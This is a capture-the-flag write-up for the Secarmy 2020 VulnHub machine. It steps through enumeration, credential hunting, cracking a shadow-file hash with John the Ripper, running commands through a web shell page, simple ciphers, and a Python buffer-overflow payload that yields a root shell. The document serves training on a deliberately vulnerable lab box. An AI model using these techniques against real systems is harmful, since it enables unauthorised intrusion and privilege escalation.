
SECARMY CTF

This is a box created for the Secarmy 2020 CTF held during GrayHat. It contains 10 challenges covering different topics, from pentesting to crypto and pwn. The machine can be found on VulnHub.

Enumeration

Running nmap we find 4 ports open :

```console
root@kali:~# nmap -p- -T5 192.168.1.41
Starting Nmap 7.80 ( https://nmap.org ) at 2020-10-30 17:41 CET
Nmap scan report for 192.168.1.41
Host is up (0.000093s latency).
Not shown: 65531 closed ports
PORT     STATE SERVICE
21/tcp   open  ftp
22/tcp   open  ssh
80/tcp   open  http
1337/tcp open  waste
MAC Address: 08:00:27:6C:A7:B6 (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 11.05 seconds
```

UNO

Going to port 80 we find the following landing page

Running gobuster we then find a hidden directory, /anon:

```console
root@kali:~# gobuster dir -u http://192.168.1.41/ -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt -t 200 -q
/javascript (Status: 301)
/anon (Status: 301)
/server-status (Status: 403)
```

Inspecting its source code we find the credentials for user uno (hidden by rendering the text in white):

```html
<html>
<head>
<title>Totally Secret Directory</title>
</head>
<body>
<center><b style="font-size: 32px;">Welcome to the hidden directory! <br>
<br>
Here are your credentials to make your way into the machine!
<br>
<br>
<font color="white">uno:luc10r4m0n</font>
</b></center>
</body>
</html>
```

After logging in over SSH we find a file containing the password for user dos:

```console
uno@svos:~$ cat readme.txt
Head over to the second user!
You surely can guess the username , the password will be:
4b3l4rd0fru705
```

DOS

Now that we have switched to dos we find another readme:

```console
dos@svos:~$ cat readme.txt
You are required to find the following string inside the files folder:
a8211ac1853a1235d48829414626512a
```

So we can simply cat all the files and grep for that string, also printing a few lines of context above and below it:

```console
dos@svos:~/files$ cat * | grep -B 10 -A 10 a8211ac1853a1235d48829414626512a
```

From the output we get:

```text
Look inside file3131.txt
```

In that file we find a string which seems to be base64 encoded:

```text
UEsDBBQDAAAAADOiO1EAAAAAAAAAAAAAAAALAAAAY2hhbGxlbmdlMi9QSwMEFAMAAAgAFZI2Udrg
tPY+AAAAQQAAABQAAABjaGFsbGVuZ2UyL2ZsYWcyLnR4dHPOz0svSiwpzUksyczPK1bk4vJILUpV
L1aozC8tUihOTc7PS1FIy0lMB7LTc1PzSqzAPKNqMyOTRCPDWi4AUEsDBBQDAAAIADOiO1Eoztrt
dAAAAIEAAAATAAAAY2hhbGxlbmdlMi90b2RvLnR4dA3KOQ7CMBQFwJ5T/I4u8hrbdCk4AUjUXp4x
IsLIS8HtSTPVbPsodT4LvUanUYff6bHd7lcKcyzLQgUN506/Ohv1+cUhYsM47hufC0WL1WdIG4WH
80xYiZiDAg8mcpZNciu0itLBCJMYtOY6eKG8SjzzcPoDUEsBAj8DFAMAAAAAM6I7UQAAAAAAAAAA
AAAAAAsAJAAAAAAAAAAQgO1BAAAAAGNoYWxsZW5nZTIvCgAgAAAAAAABABgAgMoyJN2U1gGA6WpN
3pDWAYDKMiTdlNYBUEsBAj8DFAMAAAgAFZI2UdrgtPY+AAAAQQAAABQAJAAAAAAAAAAggKSBKQAA
AGNoYWxsZW5nZTIvZmxhZzIudHh0CgAgAAAAAAABABgAAOXQa96Q1gEA5dBr3pDWAQDl0GvekNYB
UEsBAj8DFAMAAAgAM6I7USjO2u10AAAAgQAAABMAJAAAAAAAAAAggKSBmQAAAGNoYWxsZW5nZTIv
dG9kby50eHQKACAAAAAAAAEAGACAyjIk3ZTWAYDKMiTdlNYBgMoyJN2U1gFQSwUGAAAAAAMAAwAo
AQAAPgEAAAAA
```

Pasting it into CyberChef we see that the decoded data is a zip file (it starts with the `PK` magic bytes), and we can extract the files it contains.
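The same identification and extraction can be done offline without CyberChef. The following Python script is an added example, not part of the original write-up: it strips the line breaks, base64-decodes the blob, identifies the format from its leading magic bytes, and, for a zip, lists and reads every member with the standard `zipfile` module. The magic-byte table and the sample archive (`make_sample_blob`, which builds an archive with the same `challenge2/` layout and placeholder contents) are constructed for this example; the blob from `file3131.txt` above can be passed to `decode_and_inspect` in the same way.

```python
import base64
import io
import zipfile

# Leading magic bytes for a few formats commonly met in CTF files.
# (Table constructed for this example; extend as needed.)
MAGIC = {
    b"PK\x03\x04": "zip",
    b"\x1f\x8b": "gzip",
    b"\x89PNG\r\n\x1a\n": "png",
    b"\x7fELF": "elf",
    b"%PDF": "pdf",
}


def sniff(data: bytes) -> str:
    """Return a format name based on the leading magic bytes, or 'unknown'."""
    for magic, name in MAGIC.items():
        if data.startswith(magic):
            return name
    return "unknown"


def decode_and_inspect(b64_text: str) -> dict:
    """Base64-decode a blob (line breaks and spaces are tolerated), identify
    it, and for a zip return every file member's name mapped to its bytes."""
    cleaned = "".join(b64_text.split())
    data = base64.b64decode(cleaned, validate=True)
    kind = sniff(data)
    result = {"kind": kind, "size": len(data), "members": {}}
    if kind == "zip":
        with zipfile.ZipFile(io.BytesIO(data)) as zf:
            for info in zf.infolist():
                if info.is_dir():
                    continue
                result["members"][info.filename] = zf.read(info.filename)
    return result


def make_sample_blob() -> str:
    """Constructed sample: a deflated zip with the same layout as the
    challenge archive (two text files under challenge2/), base64-encoded
    and wrapped at 76 columns like the string found in file3131.txt."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("challenge2/flag2.txt", "flag2 placeholder\n")
        zf.writestr("challenge2/todo.txt", "token: <placeholder token>\n")
    raw = base64.b64encode(buf.getvalue()).decode()
    return "\n".join(raw[i:i + 76] for i in range(0, len(raw), 76))


if __name__ == "__main__":
    info = decode_and_inspect(make_sample_blob())
    print(info["kind"], info["size"], "bytes")
    for name, content in info["members"].items():
        print("---", name)
        print(content.decode())
```

Checking the magic bytes before handing data to a parser is the step worth keeping: it tells you which tool to reach for and avoids feeding an unexpected format to a decompressor.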

From todo.txt we get the following:

```text
Although its total WASTE but... here's your super secret token: c8e6afe38c2ae9a0283ecfb4e1b7c10f7d96e54c39e727d0e5515ba24a4d1f1b
```

TRES

When connecting to port 1337 we are asked for a token, so we use the one obtained from the previous file:

```console
root@kali:~# nc 192.168.1.40 1337

 Welcome to SVOS Password Recovery Facility!
 Enter the super secret token to proceed: c8e6afe38c2ae9a0283ecfb4e1b7c10f7d96e54c39e727d0e5515ba24a4d1f1b
```

And we obtain the credentials for user tres:

```text
Here's your login credentials for the third user tres:r4f43l71n4j3r0
```

CUATRO

We find a txt file inside tres's home directory which tells us to reverse a Linux binary:

```console
tres@svos:~$ cat readme.txt
A collection of conditionals has been added in the secarmy-village binary present in this folder reverse it and get the fourth user's credentials , if you have any issues with accessing the file you can head over to: https://mega.nz/file/XodTiCJD#YoLtnkxzRe_BInpX6twDn_LFQaQVnjQufFj3Hn1iEyU
```

Trying to run the binary we get an error, since the Go runtime library it links against is missing:

```console
tres@svos:~$ ./secarmy-village
./secarmy-village: error while loading shared libraries: libgo.so.16: cannot open shared object file: No such file or directory
```

So we can use strings to dump its printable data, and among the output we find the password for user cuatro (the output below is trimmed to the relevant line):

```console
tres@svos:~$ strings secarmy-village
p3dr00l1v4r3z
```

CINCO

In cuatro's home directory we find a file telling us to check /justanothergallery:

```console
cuatro@svos:~$ cat todo.txt
We have just created a new web page for our upcoming platform, its a photo gallery. You can check them out at /justanothergallery on the webserver.
```

Going to the website we find a photo gallery landing page.

Using gobuster we then find the /qr directory, which contains all the QR codes:

```console
root@kali:~# gobuster dir -u http://192.168.1.41/justanothergallery/ -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt -t 200 -q
/qr (Status: 301)
```

So we can bulk-download these QR codes with wget (the `index.html?C=…` files are just the directory-listing sort links that wget also fetched):

```console
root@kali:~# wget -r --no-parent http://192.168.1.41/justanothergallery/qr/
root@kali:~/192.168.1.41/justanothergallery/qr# ls
 image-0.png    image-17.png   image-24.png   image-31.png   image-39.png   image-46.png   image-53.png   image-60.png   image-68.png         'index.html?C=M;O=A'
 image-10.png   image-18.png   image-25.png   image-32.png   image-3.png    image-47.png   image-54.png   image-61.png   image-6.png          'index.html?C=M;O=D'
 image-11.png   image-19.png   image-26.png   image-33.png   image-40.png   image-48.png   image-55.png   image-62.png   image-7.png          'index.html?C=N;O=A'
 image-12.png   image-1.png    image-27.png   image-34.png   image-41.png   image-49.png   image-56.png   image-63.png   image-8.png          'index.html?C=N;O=D'
 image-13.png   image-20.png   image-28.png   image-35.png   image-42.png   image-4.png    image-57.png   image-64.png   image-9.png          'index.html?C=S;O=A'
 image-14.png   image-21.png   image-29.png   image-36.png   image-43.png   image-50.png   image-58.png   image-65.png   index.html           'index.html?C=S;O=D'
 image-15.png   image-22.png   image-2.png    image-37.png   image-44.png   image-51.png   image-59.png   image-66.png  'index.html?C=D;O=A'
 image-16.png   image-23.png   image-30.png   image-38.png   image-45.png   image-52.png   image-5.png    image-67.png  'index.html?C=D;O=D'
```

Then we can read the QR codes with zbarimg (from the zbar package) and a simple bash loop to automate it:

```bash
#!/bin/bash
# Decode every QR image in the current directory; -q prints only the decoded
# text, and zbarimg's diagnostics on stderr are discarded.
for f in *.png
do
  zbarimg -q "$f" 2>/dev/null
done
```

Most of the images are decoys; from the lines that decode to text we get the credentials for user cinco:

```text
QR-Code:the
QR-Code:credentials
QR-Code:for
QR-Code:solving
QR-Code:the
QR-Code:5th
QR-Code:user:
QR-Code:cinco:ruy70m35
```

SEIS

As usual we find another hint, this time telling us to look for a directory elsewhere on the filesystem:

```console
cinco@svos:~$ cat readme.txt
Check for Cinco's secret place somewhere outside the house
```

In the root of the filesystem we find a directory called /cincos-secrets:

```console
cinco@svos:/cincos-secrets$ ls -la
total 16
dr-xr-xr-x  2 cinco root 4096 Oct  9 18:07 .
drwxr-xr-x 25 root  root 4096 Oct 18 14:42 ..
-rw-r--r--  1 cinco root   31 Oct  9 18:07 hint.txt
--w-------  1 cinco root 1876 Sep 27 15:46 shadow.bak
```

There we have a backup of the shadow file (owned by cinco, so the missing read bit can simply be added with chmod) and a hint which refers to the rockyou wordlist:

```console
cinco@svos:/cincos-secrets$ cat hint.txt
we will, we will, ROCKYOU..!!!
```

The sha512crypt hash for user seis can then be cracked with John the Ripper and rockyou, giving Hogwarts as the password:

```console
root@kali:~# john shadow --wordlist=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (sha512crypt, crypt(3) $6$ [SHA512 256/256 AVX2 4x])
Cost 1 (iteration count) is 5000 for all loaded hashes
Will run 6 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
Hogwarts         (seis)
```
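John reads the algorithm and the "Cost 1 (iteration count)" straight out of the `$6$...` field, and the same information is what a defender wants when auditing a leaked or backed-up shadow file: which accounts use a fast or obsolete scheme, and which ones use the glibc default of 5000 rounds rather than a raised `rounds=` value. The following Python script is an added example, not part of the original write-up: it parses the crypt(3) password field formats described in crypt(5) (DES, md5crypt, bcrypt, sha256/sha512crypt, yescrypt) and flags weak schemes. The shadow lines in `SAMPLE_SHADOW` are constructed for the example and the hash bodies are placeholders, not real digests.

```python
import re
from typing import Dict, List, Optional

# crypt(3) scheme prefixes -> algorithm name, per crypt(5).
SCHEMES = {"1": "md5crypt", "2a": "bcrypt", "2b": "bcrypt", "2y": "bcrypt",
           "5": "sha256crypt", "6": "sha512crypt", "y": "yescrypt"}
# Fast or obsolete schemes that an audit should flag.
WEAK = {"descrypt", "md5crypt"}


def parse_crypt_field(field: str) -> Dict[str, Optional[object]]:
    """Decode the password field of a shadow entry into algorithm, work
    factor (as crypt(3) expresses it) and salt. Locked or empty accounts
    carry no hash at all."""
    info = {"algorithm": None, "rounds": None, "salt": None, "locked": False}
    if field == "" or field.startswith(("*", "!")):
        info["locked"] = True
        return info
    if not field.startswith("$"):
        # Traditional DES crypt: 2-char salt + 11-char hash, 25 DES iterations.
        info.update(algorithm="descrypt", rounds=25, salt=field[:2])
        return info
    parts = field.split("$")[1:]           # drop the empty string before the first $
    scheme = parts[0]
    algorithm = SCHEMES.get(scheme, "unknown($" + scheme + ")")
    info["algorithm"] = algorithm
    if algorithm == "bcrypt":
        info.update(rounds=2 ** int(parts[1]), salt=parts[2][:22])
    elif algorithm in ("sha256crypt", "sha512crypt"):
        rounds, idx = 5000, 1              # glibc default when rounds= is absent
        m = re.fullmatch(r"rounds=(\d+)", parts[1])
        if m:
            rounds, idx = int(m.group(1)), 2
        info.update(rounds=rounds, salt=parts[idx])
    elif algorithm == "md5crypt":
        info.update(rounds=1000, salt=parts[1])   # fixed iteration count
    elif algorithm == "yescrypt":
        info.update(rounds=parts[1], salt=parts[2])   # cost string such as "j9T"
    return info


def audit_shadow(text: str) -> List[Dict[str, object]]:
    """Parse shadow-format lines and flag accounts using a weak scheme."""
    findings = []
    for line in text.splitlines():
        if not line.strip() or line.startswith("#"):
            continue
        user, field = line.split(":", 2)[:2]
        info = parse_crypt_field(field)
        info["user"] = user
        info["weak"] = info["algorithm"] in WEAK
        findings.append(info)
    return findings


# Constructed sample shadow lines; the hash bodies are placeholders.
SAMPLE_SHADOW = """\
root:*:18500:0:99999:7:::
seis:$6$Qz3kL9pX$PLACEHOLDERHASHPLACEHOLDERHASHPLACEHOLDERHASH:18500:0:99999:7:::
svc:$6$rounds=100000$saltsalt$PLACEHOLDERHASH:18500:0:99999:7:::
legacy:$1$abcdefgh$PLACEHOLDERHASH:18500:0:99999:7:::
old:AbPLACEHOLDER:18500:0:99999:7:::
"""

if __name__ == "__main__":
    for f in audit_shadow(SAMPLE_SHADOW):
        name = f["algorithm"] or "locked"
        print(f"{f['user']:8} {name:12} rounds={f['rounds']} weak={f['weak']}")
```

The cost reported for `seis` in the constructed sample is the same 5000-iteration default that John printed above; a sha512crypt hash at that cost is within reach of a wordlist attack on commodity hardware, which is why the hint about rockyou was enough.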

SIETE

In this case we are asked to visit /shellcmsdashboard:

```console
seis@svos:~$ cat readme.txt
head over to /shellcmsdashboard webpage and find the credentials!
```

Going to the website we find a login page.

The credentials are easy to find: they are in a comment in the robots.txt file.

```text
# Username: admin Password: qwerty
```

After logging in we are asked to visit /aabbzzee.php.

That page lets us execute commands as www-data. Running `ls -la` we find an interesting file, readme9213.txt, which we do not have read permission on.

But as it is owned by www-data we can chmod it and read it, obtaining the next user's password.

OCHO

Inside siete's home we find a bunch of files and a password-protected zip file:

```console
siete@svos:~$ ls
flag7.txt  hint.txt  key.txt  message.txt  mighthelp.go  password.zip
```

The contents of the txt files are the following:

```console
siete@svos:~$ cat hint.txt
Base 10 and Base 256 result in Base 256!
siete@svos:~$ cat key.txt
x
siete@svos:~$ cat message.txt
[11 29 27 25 10 21 1 0 23 10 17 12 13 8]
```

So it is a crypto challenge where we have a list of decimal numbers (bytes written in base 10), a single ASCII key character, and we are looking for ASCII output: that points to a single-byte XOR.

Going to https://www.dcode.fr/xor-cipher we enter the numbers as the ciphertext and ‘x’ as the key, and obtain the password of the zip file.
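The same decryption takes a few lines of Python, which is an added example here and not part of the original write-up. `xor_decrypt` applies a repeating-key XOR to the numbers from message.txt (so it also covers multi-byte keys, beyond the single character used in this challenge), and `candidate_single_byte_keys` shows how the key could be recovered even without key.txt: with only 256 possible single-byte keys, trying them all and keeping the ones that yield plausible plaintext is immediate. The assumption that the plaintext consists of lowercase letters and spaces is made for this example.

```python
from typing import Dict, List

# Ciphertext from message.txt on this page: one decimal byte per character.
CIPHERTEXT = [11, 29, 27, 25, 10, 21, 1, 0, 23, 10, 17, 12, 13, 8]


def xor_decrypt(nums: List[int], key: bytes) -> str:
    """XOR each byte with the key, repeated cyclically, and decode as ASCII.
    XOR is its own inverse, so the same call also encrypts."""
    out = bytes(n ^ key[i % len(key)] for i, n in enumerate(nums))
    return out.decode("ascii", errors="replace")


def candidate_single_byte_keys(nums: List[int]) -> Dict[int, str]:
    """Try all 256 single-byte keys and keep those whose output is made only
    of lowercase letters and spaces (assumption made for this example about
    what the plaintext looks like). Returns {key_byte: plaintext}."""
    allowed = set(b"abcdefghijklmnopqrstuvwxyz ")
    hits = {}
    for k in range(256):
        plain = bytes(n ^ k for n in nums)
        if all(c in allowed for c in plain):
            hits[k] = plain.decode("ascii")
    return hits


if __name__ == "__main__":
    print("with key 'x':", xor_decrypt(CIPHERTEXT, b"x"))
    print("keys giving all-lowercase output:")
    for k, text in candidate_single_byte_keys(CIPHERTEXT).items():
        print(f"  0x{k:02x} ({chr(k)!r}): {text}")
```

The hint "Base 10 and Base 256 result in Base 256" is exactly what the code does: the decimal numbers are treated as byte values (base 256), and XORing bytes with bytes gives bytes again.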

From the zip file we obtain the credentials for user ocho:

```console
siete@svos:~$ unzip password.zip
Archive:  password.zip
[password.zip] password.txt password:
 extracting: password.txt
siete@svos:~$ cat password.txt
the next user's password is m0d3570v1ll454n4
```

NUEVE

This time we find a packet capture file:

```console
ocho@svos:~$ ls
flag8.txt  keyboard.pcapng
```

We transfer it to our machine with scp in order to analyze it with Wireshark:

```console
scp ocho@192.168.1.35:/home/ocho/keyboard.pcapng keyboard.pcapng
```

Following the HTTP stream of the GET /none.txt request we get a bunch of text, and in the middle of it we find an encrypted message.

Given the context of the challenge (the capture is named keyboard.pcapng) it looks like a keyboard shift cipher, so we can go to https://www.dcode.fr/keyboard-shift-cipher to decode it.

There we obtain the credentials for user nueve.
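A keyboard shift cipher replaces each character with the key a fixed number of positions to its left or right on the same keyboard row, so decoding is just the opposite shift. The following Python script is an added example, not part of the original write-up, and the encrypted message from the capture is not reproduced on this page, so it works on a constructed sample. It assumes a US QWERTY layout in which a shift wraps around within its row; dCode's variant may treat row ends differently. `all_shifts` tries a range of offsets in both directions, which is how one would pick the right one by eye when the shift amount is unknown.

```python
from typing import Dict

# US QWERTY rows (assumption for this example; shifts wrap within a row).
ROWS = [
    "`1234567890-=",
    "qwertyuiop[]\\",
    "asdfghjkl;'",
    "zxcvbnm,./",
]


def keyboard_shift(text: str, offset: int) -> str:
    """Move every character `offset` keys along its QWERTY row (positive is
    right, negative is left). Case is preserved; characters not on the
    keyboard, including spaces, pass through unchanged."""
    out = []
    for ch in text:
        low = ch.lower()
        for row in ROWS:
            idx = row.find(low)
            if idx != -1:
                shifted = row[(idx + offset) % len(row)]
                out.append(shifted.upper() if ch.isupper() else shifted)
                break
        else:
            out.append(ch)
    return "".join(out)


def all_shifts(cipher: str, max_offset: int = 3) -> Dict[int, str]:
    """Decode with every offset in [-max_offset, max_offset] except 0 and
    return {offset: candidate plaintext} for inspection."""
    return {k: keyboard_shift(cipher, k)
            for k in range(-max_offset, max_offset + 1) if k != 0}


if __name__ == "__main__":
    # Constructed sample: a phrase encrypted with a one-key shift to the right.
    sample = keyboard_shift("hello world", 1)
    print("ciphertext:", sample)
    for k, guess in all_shifts(sample).items():
        print(f"offset {k:+d}: {guess}")
```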

ROOT

This is the final challenge, where we need to root the machine. Inside nueve's home we find a binary and a funny readme:

```console
nueve@svos:~$ ls
flag9.txt  orangutan  readme.txt
nueve@svos:~$ cat readme.txt

                                      ,╓╓╖╗╗╗╗╖╖╓,
                                ,╓╗╬╫╫╫╫╫╫╫╫╫╫╫╫╫╫╫╫▓@╗,
                             ╓@▓╫╫╫╫╫╫╫╫╫╫╫╫╫╫╫╫╫╫╫╫╫╫╫╫╫@╖
                          ,╗▓╫╫╫▓▀▓╫╫╫╫╫╫╫╫╫╫╫╫╫╫╫╫╫╫╫╬╣╫╫╫╫@,
                        ,#╫╫╫▓▓░░░░╫╫╫╫╫╫╫╫╫╫╫╫╫╫╫╫╫╫Ñ░░░╣▓╫╫╫▌µ
                     ,╗▓╫╫╫╫▓▀░░░░░░╩╫╫Ñ╫╫╫╫╫╫╫╫░╫╫Ñ░░░░░░╠▓▓╫╫╫╫@µ
                   ╓╬╫╫╫╫╫╫▓▌░░░░░╩"``   ╙╫╫╫╫M   ``"╨╦░░░░╠▓▓╫╫╫╫╫▓╗
                 ╓╣╫╫╫╫╫╫╫▓▓░░░░╩  ,╦NÑÑNÑ░╫╫Ñ░NÑÑN╦╥  ╙░░░░╟▓▓╫╫╫╫╫╫╫W
               ,╬╫╫╫╫╫╫╫╫▓▓▌░░░╨  ╦░░░▄▓▓▄░░░░╠▓▓▓▄░░Ñ  1░░░░▓▓╫╫╫╫╫╫╫╫▓µ
              ╔╫╫╫╫╫╫╫╫╫╫▓▓▒░░░░╦N░░░╙████░░░░║███▌░░░╦╦N░░░░▓▓╫╫╫╫╫╫╫╫╫╫@
             ╬╫╫╫╫╫╫╫╫╫╫╫▓▓M░░░░░░░░░░░╠╠░░░░░░╙╠░░░░░░░░░░░░╣▓▓╫╫╫╫╫╫╫╫╫╫▓
            ╬╫╫╫╫╫╫╫╫╫╫╫╫▀░░░░░░░░░░░░░░░░╬╫╬╫░░░░░░░░░░░░░░░░╠▓╫╫╫╫╫╫╫╫╫╫╫╫,
           ╬╫╫╫╫╫╫╫╫╫╫╫▓Ñ░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░╣╫╫╫╫╫╫╫╫╫╫╫╫
          ╟╫╫╫╫╫╫╫╫╫╫╫▓M░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░▓▓╫╫╫╫╫╫╫╫╫╫▓
         ╔╫╫╫╫╫╫╫╫╫╫╫▓▓░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░╟▓▓╫╫╫╫╫╫╫╫╫╫▌
         ╫╫╫╫╫╫╫╫╫╫╫▓▓▌░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░╟▓▓▓╫╫╫╫╫╫╫╫╫╫U
        ╟╫╫╫╫╫╫╫╫╫╫╫▓▓▓░░░░░░░░░╠▄▄░░░░░░░░░░░░░░░░░░░▄▄░░░░░░░░░╟▓▓▓╫╫╫╫╫╫╫╫╫╫▓
        ╫╫╫╫╫╫╫╫╫╫╫╣▓▓▓@░░░░░░░░╠███▓▄▄▄░░░░░░░░╠▄▄▄▓██▀░░░░░░░░╠▓▓▓▓╫╫╫╫╫╫╫╫╫╫╫U
       ╟╫╫╫╫╫╫╫╫╫╫╫╫▓▓▓▓▓░░░░░░░░░░╠▀▀████████████▀▀▀░░░░░░░░░░╟▓▓▓▓▓╫╫╫╫╫╫╫╫╫╫╫▓
       ▓╫╫╫╫╫╫╫╫╫╫╫╫▓▓▓▓▓▓▓▄░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░µ╬▓▓▓▓▓▓╫╫╫╫╫╫╫╫╫╫╫╫╫U
      J╫╫╫╫╫╫╫╫╫╫╫╫╫╫▓▓▓▓▓▓▓▓▓╬µ░░░░░░░░░░░░░░░░░░░░░░░░µ▄╬▓▓▓▓▓▓▓▓╫╫╫╫╫╫╫╫╫╫╫╫╫╫@
      ╟╫╫╫╫╫╫╫╫╫╫╫╫╫╫╫╫▓▓▓▓▓▓▓▓▓▓▓▓@╬▄▄µ░░░░░░░░µµ▄▄╬▓▓▓▓▓▓▓▓▓▓▓▓▓╫╫╫╫╫╫╫╫╫╫╫╫╫╫╫╫
      ╣╫╫╫╫╫╫╫╫╫╫╫╫╫╫╫╫╫╫╫▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓╫╫╫╫╫╫╫╫╫╫╫╫╫╫╫╫╫╫╫
      ╫╫╫╫╫╫╫╫╫╫╫╫╫╫╫╫╫╫╫╫╫╫╫╫▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓╫╫╫╫╫╫╫╫╫╫╫╫╫╫╫╫╫╫╫╫╫╫╫U
      ╫╫╫╫╫╫╫╫╫╫╫╫╫╫╫╫▌ ╙╫╫╫╫╫╫╫╫M╣╬▀░░░╣▓▓▓▓▓▓▓Ñ░░╠▓M╣▓╫╫╫╫╫╫╫▀ ╙╫╫╫╫╫╫╫╫╫╫╫╫╫╫╫╫U
     ]╫╫╫╫╫╫╫╫╫╫╫╫╫╫╫╫╡  ╫╫╫▓╩╠╣M░░░░░░░░╫╫╫╫╫╫Ñ░░░░░░░░╣╠╠╢╫╫╫H J╫╫╫╫╫╫╫╫╫╫╫╫╫╫╫╫╡
     ]╫╫╫╫╫╫╫╫╫╫╫╫╫╫╫╫╡ ╔░░╠░░░░░░░░░░░░░╢╫╫╫╫╫░░░░░░░░░░░░░Ö░░N J╫╫╫╫╫╫╫╫╫╫╫╫╫╫╫╫▌
     ╞╫╫╫╫╫╫╫╫╫╫╫╫╫╫╫╫╡ 1░░░░░░░░░░░░░░░░░╫╫╫╫▌░░░░░░░░░░░░░░░░Ñ J╫╫╫╫╫╫╫╫╫╫╫╫╫╫╫╫▓
     ╟╫╫╫╫╫▓╣╣╣╣╣╫╫╫╫╫╡  1░░░░░░░░░░░░░░░░╣╫╫╫░░░░░░░░░░░░░░░░Ñ  J╫╫╫╫╫▓▓╣╣╣▓╫╫╫╫╫╫
     ╚╣░░░░░░░░░░░░░╠╠╡   1░░░░░░░░░░░░░░░╟╫╫╫░░░░░░░░░░░░░░░Ñ   J╬░░░░░░░░░░░░░░╠╬
     1░░░░░░░░░░░░░░░░H    1░░░░░░░░░░░░░░╫M▀╬░░░░░░░░░░░░░░H     ░░░░░░░░░░░░░░░░░
      ╙╨ª "╨╨``╨╨" ╚╨ª      1░░░░░░░░░░░░Ñ    1░░░░░░░░░░░░H      "╨╨``╨╨" ╚╨ª ª╨╨`
                             ╙░░░░░░░░░╨`      `ªÑ░░░░░░░░H

Can u feeeeeed my orangutan ^^
```

I ran the binary and, since the readme hinted it was a pwn challenge, I sent it a long run of ‘A’ characters to check whether it was vulnerable to a buffer overflow:

```console
nueve@svos:~$ ./orangutan
hello pwner
pwnme if u can ;)
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Segmentation fault (core dumped)
```

Then I decompiled the binary with Ghidra.

From the decompiled C code we can see that the input buffer is 24 bytes long and sits right before the local variable local_10, and that if local_10 equals 0xcafebabe the program spawns a root shell. So the input just needs to fill the 24 bytes and then overwrite local_10 with that value.

As the target machine only has python3 installed, I went back to my own machine and wrote a simple python2 script to generate the buffer that needs to be passed to the program:

```python
from struct import pack

res = 'A' * 24                   # fill the 24-byte buffer
res += pack('<I', 0xcafebabe)    # pack the value as a little-endian 32-bit int, overwriting local_10
print(res)
```

Then I redirected the output to a .txt file and uploaded it to the machine with scp.

Finally we pipe the buffer into the program, followed by a second cat that keeps stdin open and forwards our keystrokes to the /bin/sh spawned by the program, obtaining a root shell:

```console
nueve@svos:~$ (cat bof.txt;cat) | ./orangutan
hello pwner
pwnme if u can ;)
whoami
root
id
uid=0(root) gid=0(root) groups=0(root),1009(nueve)
```

This post is licensed under CC BY 4.0 by the author.